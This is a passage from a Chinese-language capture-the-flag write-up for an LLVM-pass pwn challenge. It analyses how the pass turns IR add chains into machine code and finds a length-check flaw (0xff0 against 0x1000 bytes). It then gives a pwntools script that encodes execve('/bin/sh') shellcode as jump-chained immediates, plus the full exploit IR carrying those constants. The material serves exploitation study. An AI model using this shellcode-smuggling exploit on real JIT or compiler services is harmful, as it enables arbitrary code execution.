%2 = mul i64 %0, 2
%3 = add i64 %2, -132
ret i64 %3
}
```
handle函数
这个函数是倒序处理的,不仅可以从代码中看出,也可以直接写一个脚本(根据readme)
; ModuleID = 'poc.c'
source_filename = "poc.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"
; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @main(i64 %0) #0 {
%2 = add nsw i64 %0, 286331153
%3 = add nsw i64 %2, 572662306
}
attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }
!llvm.module.flags = !{!0}
!llvm.ident = !{!1}
!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.0-4ubuntu1 "}
主要是是一个if ,else if,else的一个结构
第一个if是用来判断指令的第一个操作数是不是常数
else if 是用来判断指令的第一个参数是不是函数参数
如果都不是就会进入else
进入if和else if都会在this中添加 movabs rax ,参数 ret,其中参数占有6个,
else
首先写入movabs rax, 0指令,将
i64 %xxx中的操作数xxx(即一个变量)放进v26中,然后进入一个while循环
while循环
退出条件有两个一个是写入的数据大于0xff0二是v26中没有数据(即每个基本块执行一次)在写入一个ret
下面就是弹出两个栈中的参数,根据v26中的参数找到对应的命令行,在判断对应指令的操作符,然后取出指令的两个操作数,再次进入一个
if ,else if ,else判断1、
if判断判断第一个指令操作数是不是正负一,如果
v18 * v22是1写入指令inc rax否则是inc rbx。如果第一个操作数不是正负一,就会写入指令
movabs rbx, v18 * v222、
else if判断是不是指令的参数3、
if如果既不是常量也不是参数,就压进栈中4、下面就是对第二个操作数进行操作了,首先是判断是加还是减,然后的操作和上面的基本差不多
调试
发现基本上就两处是我们出入的
首先就是在进入else时都会写入movabs rax,0x0(只会在刚进入时写入一次)
在退出时会写入ret
第二个就是在检查第二个操作数时
写入的效果
漏洞
就是他只检查0xff0个数据,但我们可以输入0x1000个数据,但他初始化中
this[4]段中是ret只占一个字节,即使所有字节溢出最后也是ret,但我们可以输入第二次movabs rax, val
shellcode写在movabs rax, val中val中这是我们可控的大小8个
第一次输入一定以ret结尾,但我们可以写一个jmp
第二次输入的数据比第一次少就可以执行那个jmp了,下面就是一系列的跳转来调整位置,使其执行shellcode
写shellcode的位置
生成shellcode
from pwn import*
context(os = 'linux', arch = 'amd64')
shellcode = [
"mov edi, 0x68732f6e",
"shl rdi, 24",
"mov ebx, 0x69622f",
"add rdi, rbx",
"push rdi",
"push rsp",
"pop rdi",
"xor rsi, rsi",
"xor rdx, rdx",
"push 59",
"pop rax",
"syscall"
]
for sc in shellcode:
print(u64(asm(sc).ljust(6, b'\x90') + b'\xEB\xEB'))//填充为nop指令
print(u16(b'\xEB\xE4')) # 最后超出0xff0字节部分的跳转指令
exp
; ModuleID = 'exp.c'
source_filename = "exp.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"
; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @payload1(i64 %0) #0 {
%2 = add nsw i64 %0, 58603
%3 = add nsw i64 %2, 1024
%4 = add nsw i64 %3, 1024
%5 = add nsw i64 %4, 1024
%6 = add nsw i64 %5, 1024
%7 = add nsw i64 %6, 1024
%8 = add nsw i64 %7, 1024
%9 = add nsw i64 %8, 1024
%10 = add nsw i64 %9, 1024
%11 = add nsw i64 %10, 1024
%12 = add nsw i64 %11, 1024
%13 = add nsw i64 %12, 1024
%14 = add nsw i64 %13, 1024
%15 = add nsw i64 %14, 1024
%16 = add nsw i64 %15, 1024
%17 = add nsw i64 %16, 1024
%18 = add nsw i64 %17, 1024
%19 = add nsw i64 %18, 1024
%20 = add nsw i64 %19, 1024
%21 = add nsw i64 %20, 1024
%22 = add nsw i64 %21, 1024
%23 = add nsw i64 %22, 1024
%24 = add nsw i64 %23, 1024
%25 = add nsw i64 %24, 1024
%26 = add nsw i64 %25, 1024
%27 = add nsw i64 %26, 1024
%28 = add nsw i64 %27, 1024
%29 = add nsw i64 %28, 1024
%30 = add nsw i64 %29, 1024
%31 = add nsw i64 %30, 1024
%32 = add nsw i64 %31, 1024
%33 = add nsw i64 %32, 1024
%34 = add nsw i64 %33, 1024
%35 = add nsw i64 %34, 1024
%36 = add nsw i64 %35, 1024
%37 = add nsw i64 %36, 1024
%38 = add nsw i64 %37, 1024
%39 = add nsw i64 %38, 1024
%40 = add nsw i64 %39, 1024
%41 = add nsw i64 %40, 1024
%42 = add nsw i64 %41, 1024
%43 = add nsw i64 %42, 1024
%44 = add nsw i64 %43, 1024
%45 = add nsw i64 %44, 1024
%46 = add nsw i64 %45, 1024
%47 = add nsw i64 %46, 1024
%48 = add nsw i64 %47, 1024
%49 = add nsw i64 %48, 1024
%50 = add nsw i64 %49, 1024
%51 = add nsw i64 %50, 1024
%52 = add nsw i64 %51, 1024
%53 = add nsw i64 %52, 1024
%54 = add nsw i64 %53, 1024
%55 = add nsw i64 %54, 1024
%56 = add nsw i64 %55, 1024
%57 = add nsw i64 %56, 1024
%58 = add nsw i64 %57, 1024
%59 = add nsw i64 %58, 1024
%60 = add nsw i64 %59, 1024
%61 = add nsw i64 %60, 1024
%62 = add nsw i64 %61, 1024
%63 = add nsw i64 %62, 1024
%64 = add nsw i64 %63, 1024
%65 = add nsw i64 %64, 1024
%66 = add nsw i64 %65, 1024
%67 = add nsw i64 %66, 1024
%68 = add nsw i64 %67, 1024
%69 = add nsw i64 %68, 1024
%70 = add nsw i64 %69, 1024
%71 = add nsw i64 %70, 1024
%72 = add nsw i64 %71, 1024
%73 = add nsw i64 %72, 1024
%74 = add nsw i64 %73, 1024
%75 = add nsw i64 %74, 1024
%76 = add nsw i64 %75, 1024
%77 = add nsw i64 %76, 1024
%78 = add nsw i64 %77, 1024
%79 = add nsw i64 %78, 1024
%80 = add nsw i64 %79, 1024
%81 = add nsw i64 %80, 1024
%82 = add nsw i64 %81, 1024
%83 = add nsw i64 %82, 1024
%84 = add nsw i64 %83, 1024
%85 = add nsw i64 %84, 1024
%86 = add nsw i64 %85, 1024
%87 = add nsw i64 %86, 1024
%88 = add nsw i64 %87, 1024
%89 = add nsw i64 %88, 1024
%90 = add nsw i64 %89, 1024
%91 = add nsw i64 %90, 1024
%92 = add nsw i64 %91, 1024
%93 = add nsw i64 %92, 1024
%94 = add nsw i64 %93, 1024
%95 = add nsw i64 %94, 1024
%96 = add nsw i64 %95, 1024
%97 = add nsw i64 %96, 1024
%98 = add nsw i64 %97, 1024
%99 = add nsw i64 %98, 1024
%100 = add nsw i64 %99, 1024
%101 = add nsw i64 %100, 1024
%102 = add nsw i64 %101, 1024
%103 = add nsw i64 %102, 1024
%104 = add nsw i64 %103, 1024
%105 = add nsw i64 %104, 1024
%106 = add nsw i64 %105, 1024
%107 = add nsw i64 %106, 1024
%108 = add nsw i64 %107, 1024
%109 = add nsw i64 %108, 1024
%110 = add nsw i64 %109, 1024
%111 = add nsw i64 %110, 1024
%112 = add nsw i64 %111, 1024
%113 = add nsw i64 %112, 1024
%114 = add nsw i64 %113, 1024
%115 = add nsw i64 %114, 1024
%116 = add nsw i64 %115, 1024
%117 = add nsw i64 %116, 1024
%118 = add nsw i64 %117, 1024
%119 = add nsw i64 %118, 1024
%120 = add nsw i64 %119, 1024
%121 = add nsw i64 %120, 1024
%122 = add nsw i64 %121, 1024
%123 = add nsw i64 %122, 1024
%124 = add nsw i64 %123, 1024
%125 = add nsw i64 %124, 1024
%126 = add nsw i64 %125, 1024
%127 = add nsw i64 %126, 1024
%128 = add nsw i64 %127, 1024
%129 = add nsw i64 %128, 1024
%130 = add nsw i64 %129, 1024
%131 = add nsw i64 %130, 1024
%132 = add nsw i64 %131, 1024
%133 = add nsw i64 %132, 1024
%134 = add nsw i64 %133, 1024
%135 = add nsw i64 %134, 1024
%136 = add nsw i64 %135, 1024
%137 = add nsw i64 %136, 1024
%138 = add nsw i64 %137, 1024
%139 = add nsw i64 %138, 1024
%140 = add nsw i64 %139, 1024
%141 = add nsw i64 %140, 1024
%142 = add nsw i64 %141, 1024
%143 = add nsw i64 %142, 1024
%144 = add nsw i64 %143, 1024
%145 = add nsw i64 %144, 1024
%146 = add nsw i64 %145, 1024
%147 = add nsw i64 %146, 1024
%148 = add nsw i64 %147, 1024
%149 = add nsw i64 %148, 1024
%150 = add nsw i64 %149, 1024
%151 = add nsw i64 %150, 1024
%152 = add nsw i64 %151, 1024
%153 = add nsw i64 %152, 1024
%154 = add nsw i64 %153, 1024
%155 = add nsw i64 %154, 1024
%156 = add nsw i64 %155, 1024
%157 = add nsw i64 %156, 1024
%158 = add nsw i64 %157, 1024
%159 = add nsw i64 %158, 1024
%160 = add nsw i64 %159, 1024
%161 = add nsw i64 %160, 1024
%162 = add nsw i64 %161, 1024
%163 = add nsw i64 %162, 1024
%164 = add nsw i64 %163, 1024
%165 = add nsw i64 %164, 1024
%166 = add nsw i64 %165, 1024
%167 = add nsw i64 %166, 1024
%168 = add nsw i64 %167, 1024
%169 = add nsw i64 %168, 1024
%170 = add nsw i64 %169, 1024
%171 = add nsw i64 %170, 1024
%172 = add nsw i64 %171, 1024
%173 = add nsw i64 %172, 1024
%174 = add nsw i64 %173, 1024
%175 = add nsw i64 %174, 1024
%176 = add nsw i64 %175, 1024
%177 = add nsw i64 %176, 1024
%178 = add nsw i64 %177, 1024
%179 = add nsw i64 %178, 1024
%180 = add nsw i64 %179, 1024
%181 = add nsw i64 %180, 1024
%182 = add nsw i64 %181, 1024
%183 = add nsw i64 %182, 1024
%184 = add nsw i64 %183, 1024
%185 = add nsw i64 %184, 1024
%186 = add nsw i64 %185, 1024
%187 = add nsw i64 %186, 1024
%188 = add nsw i64 %187, 1024
%189 = add nsw i64 %188, 1024
%190 = add nsw i64 %189, 1024
%191 = add nsw i64 %190, 1024
%192 = add nsw i64 %191, 1024
%193 = add nsw i64 %192, 1024
%194 = add nsw i64 %193, 1024
%195 = add nsw i64 %194, 1024
%196 = add nsw i64 %195, 1024
%197 = add nsw i64 %196, 1024
%198 = add nsw i64 %197, 1024
%199 = add nsw i64 %198, 1024
%200 = add nsw i64 %199, 1024
%201 = add nsw i64 %200, 1024
%202 = add nsw i64 %201, 1024
%203 = add nsw i64 %202, 1024
%204 = add nsw i64 %203, 1024
%205 = add nsw i64 %204, 1024
%206 = add nsw i64 %205, 1024
%207 = add nsw i64 %206, 1024
%208 = add nsw i64 %207, 1024
%209 = add nsw i64 %208, 1024
%210 = add nsw i64 %209, 1024
%211 = add nsw i64 %210, 1024
%212 = add nsw i64 %211, 1024
%213 = add nsw i64 %212, 1024
%214 = add nsw i64 %213, 1024
%215 = add nsw i64 %214, 1024
%216 = add nsw i64 %215, 1024
%217 = add nsw i64 %216, 1024
%218 = add nsw i64 %217, 1024
%219 = add nsw i64 %218, 1024
%220 = add nsw i64 %219, 1024
%221 = add nsw i64 %220, 1024
%222 = add nsw i64 %221, 1024
%223 = add nsw i64 %222, 1024
%224 = add nsw i64 %223, 1024
%225 = add nsw i64 %224, 1024
%226 = add nsw i64 %225, 1024
%227 = add nsw i64 %226, 1024
%228 = add nsw i64 %227, 1024
%229 = add nsw i64 %228, 1024
%230 = add nsw i64 %229, 1024
%231 = add nsw i64 %230, 1024
%232 = add nsw i64 %231, 1024
%233 = add nsw i64 %232, 1024
%234 = add nsw i64 %233, 1024
%235 = add nsw i64 %234, 1024
%236 = add nsw i64 %235, 1024
%237 = add nsw i64 %236, 1024
%238 = add nsw i64 %237, 1024
%239 = add nsw i64 %238, 1024
%240 = add nsw i64 %239, 1024
%241 = add nsw i64 %240, 1024
%242 = add nsw i64 %241, 1024
%243 = add nsw i64 %242, 1024
%244 = add nsw i64 %243, 1024
%245 = add nsw i64 %244, 1024
%246 = add nsw i64 %245, 1024
%247 = add nsw i64 %246, 1024
%248 = add nsw i64 %247, 1024
%249 = add nsw i64 %248, 1024
%250 = add nsw i64 %249, 1024
%251 = add nsw i64 %250, 1024
%252 = add nsw i64 %251, 1024
%253 = add nsw i64 %252, 1024
%254 = add nsw i64 %253, 1024
%255 = add nsw i64 %254, 1024
%256 = add nsw i64 %255, 1024
%257 = add nsw i64 %256, 1024
%258 = add nsw i64 %257, 1024
%259 = add nsw i64 %258, 1024
%260 = add nsw i64 %259, 1024
%261 = add nsw i64 %260, 1024
%262 = add nsw i64 %261, 1024
%263 = add nsw i64 %262, 1024
%264 = add nsw i64 %263, 1024
%265 = add nsw i64 %264, 1024
%266 = add nsw i64 %265, 1024
%267 = add nsw i64 %266, 1024
%268 = add nsw i64 %267, 1024
%269 = add nsw i64 %268, 1024
%270 = add nsw i64 %269, 1024
%271 = add nsw i64 %270, 1024
%272 = add nsw i64 %271, 1024
%273 = add nsw i64 %272, 1024
%274 = add nsw i64 %273, 1024
%275 = add nsw i64 %274, 1024
%276 = add nsw i64 %275, 1024
%277 = add nsw i64 %276, 1024
%278 = add nsw i64 %277, 1024
%279 = add nsw i64 %278, 1024
%280 = add nsw i64 %279, 1024
%281 = add nsw i64 %280, 1024
%282 = add nsw i64 %281, 1024
%283 = add nsw i64 %282, 1024
%284 = add nsw i64 %283, 1024
%285 = add nsw i64 %284, 1024
%286 = add nsw i64 %285, 1024
%287 = add nsw i64 %286, 1024
%288 = add nsw i64 %287, 1024
%289 = add nsw i64 %288, 1024
%290 = add nsw i64 %289, 1024
%291 = add nsw i64 %290, 1024
%292 = add nsw i64 %291, 1024
%293 = add nsw i64 %292, 1024
%294 = add nsw i64 %293, 1024
%295 = add nsw i64 %294, 1024
%296 = add nsw i64 %295, 1024
%297 = add nsw i64 %296, 1024
%298 = add nsw i64 %297, 1024
%299 = add nsw i64 %298, 1024
%300 = add nsw i64 %299, 1024
%301 = add nsw i64 %300, 1024
%302 = add nsw i64 %301, 1024
%303 = add nsw i64 %302, 1024
%304 = add nsw i64 %303, 1024
%305 = add nsw i64 %304, 1024
%306 = add nsw i64 %305, 1024
%307 = add nsw i64 %306, 1024
%308 = add nsw i64 %307, 1024
%309 = add nsw i64 %308, 1024
%310 = add nsw i64 %309, 1024
%311 = add nsw i64 %310, 1024
%312 = add nsw i64 %311, 1024
%313 = add nsw i64 %312, 1024
%314 = add nsw i64 %313, 1024
%315 = add nsw i64 %314, 1024
ret i64 %315
}
; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @payload2(i64 %0) #0 {
%2 = add nsw i64 %0, 1
%3 = add nsw i64 %2, 1
%4 = add nsw i64 %3, 1
%5 = add nsw i64 %4, 1
%6 = add nsw i64 %5, 1
%7 = add nsw i64 %6, 16999839996723556031
%8 = add nsw i64 %7, 16999840167007600968
%9 = add nsw i64 %8, 16999839549882511291
%10 = add nsw i64 %9, 16999840169020293448
%11 = add nsw i64 %10, 16999840169015152727
%12 = add nsw i64 %11, 16999840169015152724
%13 = add nsw i64 %12, 16999840169015152735
%14 = add nsw i64 %13, 16999840169021813064
%15 = add nsw i64 %14, 16999840169019453768
%16 = add nsw i64 %15, 16999840169015130986
%17 = add nsw i64 %16, 16999840169015152728
%18 = add nsw i64 %17, 16999840169015117071
%19 = add nsw i64 %18, 1024
%20 = add nsw i64 %19, 1024
%21 = add nsw i64 %20, 1024
%22 = add nsw i64 %21, 1024
%23 = add nsw i64 %22, 1024
%24 = add nsw i64 %23, 1024
%25 = add nsw i64 %24, 1024
%26 = add nsw i64 %25, 1024
%27 = add nsw i64 %26, 1024
%28 = add nsw i64 %27, 1024
%29 = add nsw i64 %28, 1024
%30 = add nsw i64 %29, 1024
%31 = add nsw i64 %30, 1024
%32 = add nsw i64 %31, 1024
%33 = add nsw i64 %32, 1024
%34 = add nsw i64 %33, 1024
%35 = add nsw i64 %34, 1024
%36 = add nsw i64 %35, 1024
%37 = add nsw i64 %36, 1024
%38 = add nsw i64 %37, 1024
%39 = add nsw i64 %38, 1024
%40 = add nsw i64 %39, 1024
%41 = add nsw i64 %40, 1024
%42 = add nsw i64 %41, 1024
%43 = add nsw i64 %42, 1024
%44 = add nsw i64 %43, 1024
%45 = add nsw i64 %44, 1024
%46 = add nsw i64 %45, 1024
%47 = add nsw i64 %46, 1024
%48 = add nsw i64 %47, 1024
%49 = add nsw i64 %48, 1024
%50 = add nsw i64 %49, 1024
%51 = add nsw i64 %50, 1024
%52 = add nsw i64 %51, 1024
%53 = add nsw i64 %52, 1024
%54 = add nsw i64 %53, 1024
%55 = add nsw i64 %54, 1024
%56 = add nsw i64 %55, 1024
%57 = add nsw i64 %56, 1024
%58 = add nsw i64 %57, 1024
%59 = add nsw i64 %58, 1024
%60 = add nsw i64 %59, 1024
%61 = add nsw i64 %60, 1024
%62 = add nsw i64 %61, 1024
%63 = add nsw i64 %62, 1024
%64 = add nsw i64 %63, 1024
%65 = add nsw i64 %64, 1024
%66 = add nsw i64 %65, 1024
%67 = add nsw i64 %66, 1024
%68 = add nsw i64 %67, 1024
%69 = add nsw i64 %68, 1024
%70 = add nsw i64 %69, 1024
%71 = add nsw i64 %70, 1024
%72 = add nsw i64 %71, 1024
%73 = add nsw i64 %72, 1024
%74 = add nsw i64 %73, 1024
%75 = add nsw i64 %74, 1024
%76 = add nsw i64 %75, 1024
%77 = add nsw i64 %76, 1024
%78 = add nsw i64 %77, 1024
%79 = add nsw i64 %78, 1024
%80 = add nsw i64 %79, 1024
%81 = add nsw i64 %80, 1024
%82 = add nsw i64 %81, 1024
%83 = add nsw i64 %82, 1024
%84 = add nsw i64 %83, 1024
%85 = add nsw i64 %84, 1024
%86 = add nsw i64 %85, 1024
%87 = add nsw i64 %86, 1024
%88 = add nsw i64 %87, 1024
%89 = add nsw i64 %88, 1024
%90 = add nsw i64 %89, 1024
%91 = add nsw i64 %90, 1024
%92 = add nsw i64 %91, 1024
%93 = add nsw i64 %92, 1024
%94 = add nsw i64 %93, 1024
%95 = add nsw i64 %94, 1024
%96 = add nsw i64 %95, 1024
%97 = add nsw i64 %96, 1024
%98 = add nsw i64 %97, 1024
%99 = add nsw i64 %98, 1024
%100 = add nsw i64 %99, 1024
%101 = add nsw i64 %100, 1024
%102 = add nsw i64 %101, 1024
%103 = add nsw i64 %102, 1024
%104 = add nsw i64 %103, 1024
%105 = add nsw i64 %104, 1024
%106 = add nsw i64 %105, 1024
%107 = add nsw i64 %106, 1024
%108 = add nsw i64 %107, 1024
%109 = add nsw i64 %108, 1024
%110 = add nsw i64 %109, 1024
%111 = add nsw i64 %110, 1024
%112 = add nsw i64 %111, 1024
%113 = add nsw i64 %112, 1024
%114 = add nsw i64 %113, 1024
%115 = add nsw i64 %114, 1024
%116 = add nsw i64 %115, 1024
%117 = add nsw i64 %116, 1024
%118 = add nsw i64 %117, 1024
%119 = add nsw i64 %118, 1024
%120 = add nsw i64 %119, 1024
%121 = add nsw i64 %120, 1024
%122 = add nsw i64 %121, 1024
%123 = add nsw i64 %122, 1024
%124 = add nsw i64 %123, 1024
%125 = add nsw i64 %124, 1024
%126 = add nsw i64 %125, 1024
%127 = add nsw i64 %126, 1024
%128 = add nsw i64 %127, 1024
%129 = add nsw i64 %128, 1024
%130 = add nsw i64 %129, 1024
%131 = add nsw i64 %130, 1024
%132 = add nsw i64 %131, 1024
%133 = add nsw i64 %132, 1024
%134 = add nsw i64 %133, 1024
%135 = add nsw i64 %134, 1024
%136 = add nsw i64 %135, 1024
%137 = add nsw i64 %136, 1024
%138 = add nsw i64 %137, 1024
%139 = add nsw i64 %138, 1024
%140 = add nsw i64 %139, 1024
%141 = add nsw i64 %140, 1024
%142 = add nsw i64 %141, 1024
%143 = add nsw i64 %142, 1024
%144 = add nsw i64 %143, 1024
%145 = add nsw i64 %144, 1024
%146 = add nsw i64 %145, 1024
%147 = add nsw i64 %146, 1024
%148 = add nsw i64 %147, 1024
%149 = add nsw i64 %148, 1024
%150 = add nsw i64 %149, 1024
%151 = add nsw i64 %150, 1024
%152 = add nsw i64 %151, 1024
%153 = add nsw i64 %152, 1024
%154 = add nsw i64 %153, 1024
%155 = add nsw i64 %154, 1024
%156 = add nsw i64 %155, 1024
%157 = add nsw i64 %156, 1024
%158 = add nsw i64 %157, 1024
%159 = add nsw i64 %158, 1024
%160 = add nsw i64 %159, 1024
%161 = add nsw i64 %160, 1024
%162 = add nsw i64 %161, 1024
%163 = add nsw i64 %162, 1024
%164 = add nsw i64 %163, 1024
%165 = add nsw i64 %164, 1024
%166 = add nsw i64 %165, 1024
%167 = add nsw i64 %166, 1024
%168 = add nsw i64 %167, 1024
%169 = add nsw i64 %168, 1024
%170 = add nsw i64 %169, 1024
%171 = add nsw i64 %170, 1024
%172 = add nsw i64 %171, 1024
%173 = add nsw i64 %172, 1024
%174 = add nsw i64 %173, 1024
%175 = add nsw i64 %174, 1024
%176 = add nsw i64 %175, 1024
%177 = add nsw i64 %176, 1024
%178 = add nsw i64 %177, 1024
%179 = add nsw i64 %178, 1024
%180 = add nsw i64 %179, 1024
%181 = add nsw i64 %180, 1024
%182 = add nsw i64 %181, 1024
%183 = add nsw i64 %182, 1024
%184 = add nsw i64 %183, 1024
%185 = add nsw i64 %184, 1024
%186 = add nsw i64 %185, 1024
%187 = add nsw i64 %186, 1024
%188 = add nsw i64 %187, 1024
%189 = add nsw i64 %188, 1024
%190 = add nsw i64 %189, 1024
%191 = add nsw i64 %190, 1024
%192 = add nsw i64 %191, 1024
%193 = add nsw i64 %192, 1024
%194 = add nsw i64 %193, 1024
%195 = add nsw i64 %194, 1024
%196 = add nsw i64 %195, 1024
%197 = add nsw i64 %196, 1024
%198 = add nsw i64 %197, 1024
%199 = add nsw i64 %198, 1024
%200 = add nsw i64 %199, 1024
%201 = add nsw i64 %200, 1024
%202 = add nsw i64 %201, 1024
%203 = add nsw i64 %202, 1024
%204 = add nsw i64 %203, 1024
%205 = add nsw i64 %204, 1024
%206 = add nsw i64 %205, 1024
%207 = add nsw i64 %206, 1024
%208 = add nsw i64 %207, 1024
%209 = add nsw i64 %208, 1024
%210 = add nsw i64 %209, 1024
%211 = add nsw i64 %210, 1024
%212 = add nsw i64 %211, 1024
%213 = add nsw i64 %212, 1024
%214 = add nsw i64 %213, 1024
%215 = add nsw i64 %214, 1024
%216 = add nsw i64 %215, 1024
%217 = add nsw i64 %216, 1024
%218 = add nsw i64 %217, 1024
%219 = add nsw i64 %218, 1024
%220 = add nsw i64 %219, 1024
%221 = add nsw i64 %220, 1024
%222 = add nsw i64 %221, 1024
%223 = add nsw i64 %222, 1024
%224 = add nsw i64 %223, 1024
%225 = add nsw i64 %224, 1024
%226 = add nsw i64 %225, 1024
%227 = add nsw i64 %226, 1024
%228 = add nsw i64 %227, 1024
%229 = add nsw i64 %228, 1024
%230 = add nsw i64 %229, 1024
%231 = add nsw i64 %230, 1024
%232 = add nsw i64 %231, 1024
%233 = add nsw i64 %232, 1024
%234 = add nsw i64 %233, 1024
%235 = add nsw i64 %234, 1024
%236 = add nsw i64 %235, 1024
%237 = add nsw i64 %236, 1024
%238 = add nsw i64 %237, 1024
%239 = add nsw i64 %238, 1024
%240 = add nsw i64 %239, 1024
%241 = add nsw i64 %240, 1024
%242 = add nsw i64 %241, 1024
%243 = add nsw i64 %242, 1024
%244 = add nsw i64 %243, 1024
%245 = add nsw i64 %244, 1024
%246 = add nsw i64 %245, 1024
%247 = add nsw i64 %246, 1024
%248 = add nsw i64 %247, 1024
%249 = add nsw i64 %248, 1024
%250 = add nsw i64 %249, 1024
%251 = add nsw i64 %250, 1024
%252 = add nsw i64 %251, 1024
%253 = add nsw i64 %252, 1024
%254 = add nsw i64 %253, 1024
%255 = add nsw i64 %254, 1024
%256 = add nsw i64 %255, 1024
%257 = add nsw i64 %256, 1024
%258 = add nsw i64 %257, 1024
%259 = add nsw i64 %258, 1024
%260 = add nsw i64 %259, 1024
%261 = add nsw i64 %260, 1024
%262 = add nsw i64 %261, 1024
%263 = add nsw i64 %262, 1024
%264 = add nsw i64 %263, 1024
%265 = add nsw i64 %264, 1024
%266 = add nsw i64 %265, 1024
%267 = add nsw i64 %266, 1024
%268 = add nsw i64 %267, 1024
%269 = add nsw i64 %268, 1024
%270 = add nsw i64 %269, 1024
%271 = add nsw i64 %270, 1024
%272 = add nsw i64 %271, 1024
%273 = add nsw i64 %272, 1024
%274 = add nsw i64 %273, 1024
%275 = add nsw i64 %274, 1024
%276 = add nsw i64 %275, 1024
%277 = add nsw i64 %276, 1024
%278 = add nsw i64 %277, 1024
%279 = add nsw i64 %278, 1024
%280 = add nsw i64 %279, 1024
%281 = add nsw i64 %280, 1024
%282 = add nsw i64 %281, 1024
%283 = add nsw i64 %282, 1024
%284 = add nsw i64 %283, 1024
%285 = add nsw i64 %284, 1024
%286 = add nsw i64 %285, 1024
%287 = add nsw i64 %286, 1024
%288 = add nsw i64 %287, 1024
%289 = add nsw i64 %288, 1024
%290 = add nsw i64 %289, 1024
%291 = add nsw i64 %290, 1024
%292 = add nsw i64 %291, 1024
%293 = add nsw i64 %292, 1024
%294 = add nsw i64 %293, 1024
%295 = add nsw i64 %294, 1024
%296 = add nsw i64 %295, 1024
%297 = add nsw i64 %296, 1024
%298 = add nsw i64 %297, 1024
%299 = add nsw i64 %298, 1024
%300 = add nsw i64 %299, 1024
%301 = add nsw i64 %300, 1024
%302 = add nsw i64 %301, 1024
%303 = add nsw i64 %302, 1024
%304 = add nsw i64 %303, 1024
%305 = add nsw i64 %304, 1024
%306 = add nsw i64 %305, 1024
%307 = add nsw i64 %306, 1024
%308 = add nsw i64 %307, 1024
%309 = add nsw i64 %308, 1024
%310 = add nsw i64 %309, 1024
%311 = add nsw i64 %310, 1024
%312 = add nsw i64 %311, 1024
%313 = add nsw i64 %312, 1024
%314 = add nsw i64 %313, 1024
%315 = add nsw i64 %314, 1024
%316 = add nsw i64 %315, 1024
%317 = add nsw i64 %316, 1024
%318 = add nsw i64 %317, 1024
ret i64 %318
}
attributes #0 = { noinline nounwind optnone uwtable "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="true" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "tune-cpu"="generic" "unsafe-fp-math"="false" "use-soft-float"="false" }
!llvm.module.flags = !{!0}
!llvm.ident = !{!1}
!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"Ubuntu clang version 12.0.0-3ubuntu1~20.04.5"}